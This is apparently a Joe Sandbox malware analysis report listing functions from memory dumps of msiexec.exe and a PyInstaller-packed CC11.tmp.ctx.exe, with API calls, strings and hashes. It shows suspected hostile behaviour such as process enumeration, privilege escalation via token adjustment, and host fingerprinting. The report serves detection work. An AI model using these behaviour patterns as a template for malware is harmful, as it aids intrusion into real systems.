Instruction ID: 0ecc07f0e93c19f1d36d76d610fa0d9e728b0d8334172b4f4effe470eba9938b
Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction Fuzzy Hash: CC31C77661CEC185D770AB19E4D87AAA3A0F788750F800125DA8D83B68DF3CD159CB10

Function 00007FF7179D4004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7179D4022
Process32FirstW.KERNEL32 ref: 00007FF7179D4054
wcscmp.MSVCRT ref: 00007FF7179D406B
CloseHandle.KERNEL32 ref: 00007FF7179D40A1

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
String ID:
API String ID: 2850635065-0
Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction ID: 8e4b27fc9651e1eac78e040a419806bc51a45551b63993e82db8b907013a6b83
Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction Fuzzy Hash: 1711AC71A0CA8782E770AF11F48C3AAE3A0FB84764F904235DA9D426A9DF7DD50DDB10

Function 00007FF7179D3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00007FF7179D3784
GetVolumeInformationW.KERNEL32 ref: 00007FF7179D3801
wsprintfW.USER32 ref: 00007FF7179D38A2

Strings

%08lX%04lX%lu, xrefs: 00007FF7179D3893

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu
API String ID: 3001812590-640692576
Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction ID: a0f0575e4a18936d0195e17a6478dd76f0ba840463d63ba74fa476125f0abf57
Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction Fuzzy Hash: 1B31092661CAC2C6D730EB64E4983AAF3A0FB84711F801136E68D87A59DB7DC50DCB10

Function 00007FF7179D2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7179D38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D390D
Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3922
Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3935
Part of subcall function 00007FF7179D38C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3945
Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D396D
Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3980
Part of subcall function 00007FF7179D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7179D3AA9), ref: 00007FF7179D3995

Part of subcall function 00007FF7179D40E4: GetCurrentProcess.KERNEL32 ref: 00007FF7179D414B
Part of subcall function 00007FF7179D40E4: OpenProcessToken.ADVAPI32 ref: 00007FF7179D415E
Part of subcall function 00007FF7179D40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7179D4186
Part of subcall function 00007FF7179D40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7179D41B1
Part of subcall function 00007FF7179D40E4: CloseHandle.KERNEL32 ref: 00007FF7179D41BC
Part of subcall function 00007FF7179D40E4: OpenProcess.KERNEL32 ref: 00007FF7179D41D1
Part of subcall function 00007FF7179D40E4: CloseHandle.KERNEL32 ref: 00007FF7179D4249

GetProcessHeap.KERNEL32 ref: 00007FF7179D3037
HeapFree.KERNEL32 ref: 00007FF7179D304A

Strings

chFrWWdQWsLFevUr, xrefs: 00007FF7179D2FDB
.x64, xrefs: 00007FF7179D2FEE

Memory Dump Source

Source File: 00000009.00000002.2170651124.00007FF7179D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7179D0000, based on PE: true

Associated: 00000009.00000002.2170586687.00007FF7179D0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170707995.00007FF7179D5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170761768.00007FF7179D7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170845507.00007FF7179D8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2170918477.00007FF7179DA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7179d0000_msiexec.jbxd

Similarity

API ID: lstrcat$Process$CloseHandleHeapOpenToken$AdjustCreateCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
String ID: .x64$chFrWWdQWsLFevUr
API String ID: 3235591951-2286007224
Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction ID: d4b64eba7746867c87baa94b554bf20c2f053807b08695bfb1aebe8006aa9826
Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction Fuzzy Hash: C111C220A18EC385E710FB64E8CC3A9E7A0FB98764FC04135D54D42666EF7CE05E8B60

Analysis Process: CC11.tmp.ctx.exePID: 7140, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF690011000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF690013905
pkg, xrefs: 00007FF6900137CF
pyi-contents-directory, xrefs: 00007FF6900135F8
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6900136FC
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF690013A12
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6900137EF
pyi-disable-windowed-traceback, xrefs: 00007FF69001361D
pyi-runtime-tmpdir, xrefs: 00007FF6900135D3
MEI, xrefs: 00007FF69001374E
Failed to start splash screen!, xrefs: 00007FF690013933
Could not create temporary directory!, xrefs: 00007FF690013838
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF690013820
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF690013A31
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF690013653
_MEIPASS2, xrefs: 00007FF6900136A2, 00007FF6900136AE, 00007FF6900139AC
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF69001378C
Failed to convert DLL search path!, xrefs: 00007FF6900138A3
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF69001391A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: 584115fd1db2c40171e3cbeeecd4cdcfff0b65b79360e5f9804180160524b8df
Instruction ID: 474b030fdf745ab564fdf7fb3f6c5f80cb3659e2ab9b4b01cf09ef63c0e4f6ba
Opcode Fuzzy Hash: 584115fd1db2c40171e3cbeeecd4cdcfff0b65b79360e5f9804180160524b8df
Instruction Fuzzy Hash: 75F17C21A0CA82B1EBB9DB31D5542F96661EF44788F8440B2EA5DC33DEEF2CE559D300

Function 00007FF690035C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6900359A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900359E9
Part of subcall function 00007FF6900359A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690035A67
Part of subcall function 00007FF6900359A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690035AB8

CreateFileW.KERNELBASE ref: 00007FF690035D7A
CreateFileW.KERNEL32 ref: 00007FF690035DCA
GetLastError.KERNEL32 ref: 00007FF690035DFA
GetFileType.KERNELBASE ref: 00007FF690035E0F
GetLastError.KERNEL32 ref: 00007FF690035E19
CloseHandle.KERNEL32 ref: 00007FF690035E4C
CloseHandle.KERNEL32 ref: 00007FF690035FAF
CreateFileW.KERNEL32 ref: 00007FF690035FE4
GetLastError.KERNEL32 ref: 00007FF690035FF3

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: 508367570384a89883b3ecbd5e794a836ca73a2b604927ea56c7b07e99bd5283
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 17C1BF36B28A4196EB25CF79C490AAD3761FB49BA8B011275DF2ED77A8CF38D151C300

Function 00007FF6900179B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A1B
RemoveDirectoryW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A9E
DeleteFileW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ABD
FindNextFileW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ACB
FindClose.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ADC
RemoveDirectoryW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017AE5

Strings

%s\*, xrefs: 00007FF6900179E2

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 502c55dc6f1132b9c735b8fea1043c38e0679fed4e087c35def80b6b0518c691
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: A4416F21A0C942A5EAB09B34E4545BD6361FF98758F800672E69DC37DCDF7CD68AC701

Function 00007FF6900185A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6900185D3
FindClose.KERNELBASE ref: 00007FF6900185E2

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 5fed89063433a5787eb8b26b0daf6557e4d07e8364db9dd4f400cd070d38da90
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 87F0C222A19682D6F7B08B70B4997667390EB8472CF440335EA6D427D8DF7CE059CB04

Function 00007FF69002FBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
Instruction ID: f448b072ed3fbe82ca8d86ed0d5e8159ca1899eaecb149c2c71fb03d0a6456b3
Opcode Fuzzy Hash: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
Instruction Fuzzy Hash: 0002C221A0E64760FE76EB3A94116BE2680EF05BD0F5546B9DD6DC63DEDE3CE4128300

Function 00007FF6900118F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6900176A0: _fread_nolock.LIBCMT ref: 00007FF69001774A

_fread_nolock.LIBCMT ref: 00007FF6900119B4

Part of subcall function 00007FF690012760: MessageBoxW.USER32 ref: 00007FF69001283B

Strings

MEI, xrefs: 00007FF690011931
fseek, xrefs: 00007FF690011990
Could not allocate memory for archive structure!, xrefs: 00007FF6900119EE
calloc, xrefs: 00007FF6900119F5
Could not allocate buffer for TOC!, xrefs: 00007FF690011AA1
Failed to seek to cookie position!, xrefs: 00007FF690011989
malloc, xrefs: 00007FF690011AA8
Error on file., xrefs: 00007FF690011B0A
Could not read full TOC!, xrefs: 00007FF690011AD4
Failed to read cookie!, xrefs: 00007FF6900119BF
fread, xrefs: 00007FF6900119C6, 00007FF690011ADB

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: 1cb2d85d5cc1e405446bb646beb60a09ea5b3a7daa30bb022579de459a0b6986
Instruction ID: c6ec25d58129f3898a73b6695eec0cc0cbdd8efc9c084f79fb128f5bd52e115b
Opcode Fuzzy Hash: 1cb2d85d5cc1e405446bb646beb60a09ea5b3a7daa30bb022579de459a0b6986
Instruction Fuzzy Hash: 92719231A0CA86A5EBB5CB34E4906F923A5EF4878CF444075EA8DC779DEF2CE5458B00

Function 00007FF6900115C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fseek, xrefs: 00007FF690011695
fopen, xrefs: 00007FF69001161E
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6900116EF
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF690011785
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF690011775
Failed to extract %s: failed to open archive file!, xrefs: 00007FF69001165B
fwrite, xrefs: 00007FF69001177C
Failed to create symbolic link %s!, xrefs: 00007FF6900115E2
malloc, xrefs: 00007FF6900116F6
Failed to extract %s: failed to open target file!, xrefs: 00007FF690011617
fread, xrefs: 00007FF69001178C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF69001168E

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 87dd95af00602e0483b2d31c7e05800b7ac94f6c55a4757f68a6d2680965d63d
Instruction ID: ee742e4f6f097153597633819966c6b8083df9f4d1c47e0dab09a000bea35550
Opcode Fuzzy Hash: 87dd95af00602e0483b2d31c7e05800b7ac94f6c55a4757f68a6d2680965d63d
Instruction Fuzzy Hash: 3951AC21B0CA43A2EA759B35A8405B923A5FF88B9CF4441B1EE1C877DDEF3CE5558700

Function 00007FF690017FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF6900139C0), ref: 00007FF69001800A
GetStartupInfoW.KERNEL32(?,00007FF6900139C0), ref: 00007FF69001802B

Part of subcall function 00007FF69002978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900297A0

Part of subcall function 00007FF690027A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690027A93

GetCommandLineW.KERNEL32(?,00007FF6900139C0), ref: 00007FF6900180CD
CreateProcessW.KERNELBASE ref: 00007FF69001810F
WaitForSingleObject.KERNEL32(?,00007FF6900139C0), ref: 00007FF690018123
GetExitCodeProcess.KERNELBASE ref: 00007FF690018133

Strings

CreateProcessW, xrefs: 00007FF690018146
Failed to create child process!, xrefs: 00007FF69001813F

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 98b1619266e7276d40818b8af2a6d3fe626508889facaf9dce3d4a688e65152f
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 25411C32A18B8291DA309B34F4552AE73A1FBC9364F500375E6AD877D9DF7CD1458B40

Function 00007FF6900111F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6900112C3
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6900113EE
malloc, xrefs: 00007FF69001129C, 00007FF6900112CA
1.3.1, xrefs: 00007FF690011229
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF690011295
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF690011256

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
Instruction ID: b8229354cb737035eb547da92c6e0298408ba426b6b28c7a675c58376e249db5
Opcode Fuzzy Hash: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
Instruction Fuzzy Hash: 5651C122A08A42A1EAB59B36A4403FA6295FF8479CF444175EE5DC7BDDEF3CE542C700

Function 00007FF69002E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E19C
GetProcAddress.KERNEL32(?,?,?,00007FF69002E3BA,?,?,-00000018,00007FF69002A063,?,?,?,00007FF690029F5A,?,?,?,00007FF69002524E), ref: 00007FF69002E1A8

Strings

ext-ms-, xrefs: 00007FF69002E0F9
api-ms-, xrefs: 00007FF69002E0E6

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: d0defe813a72f8529ad1aa1cff3ddcf350b369db17ed7d5ce06ddcad7963068c
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: 4C41D131B19A42A1FA36CB3AA8006752796FF49BA0F484175EE1DC778CEE7CE4568300

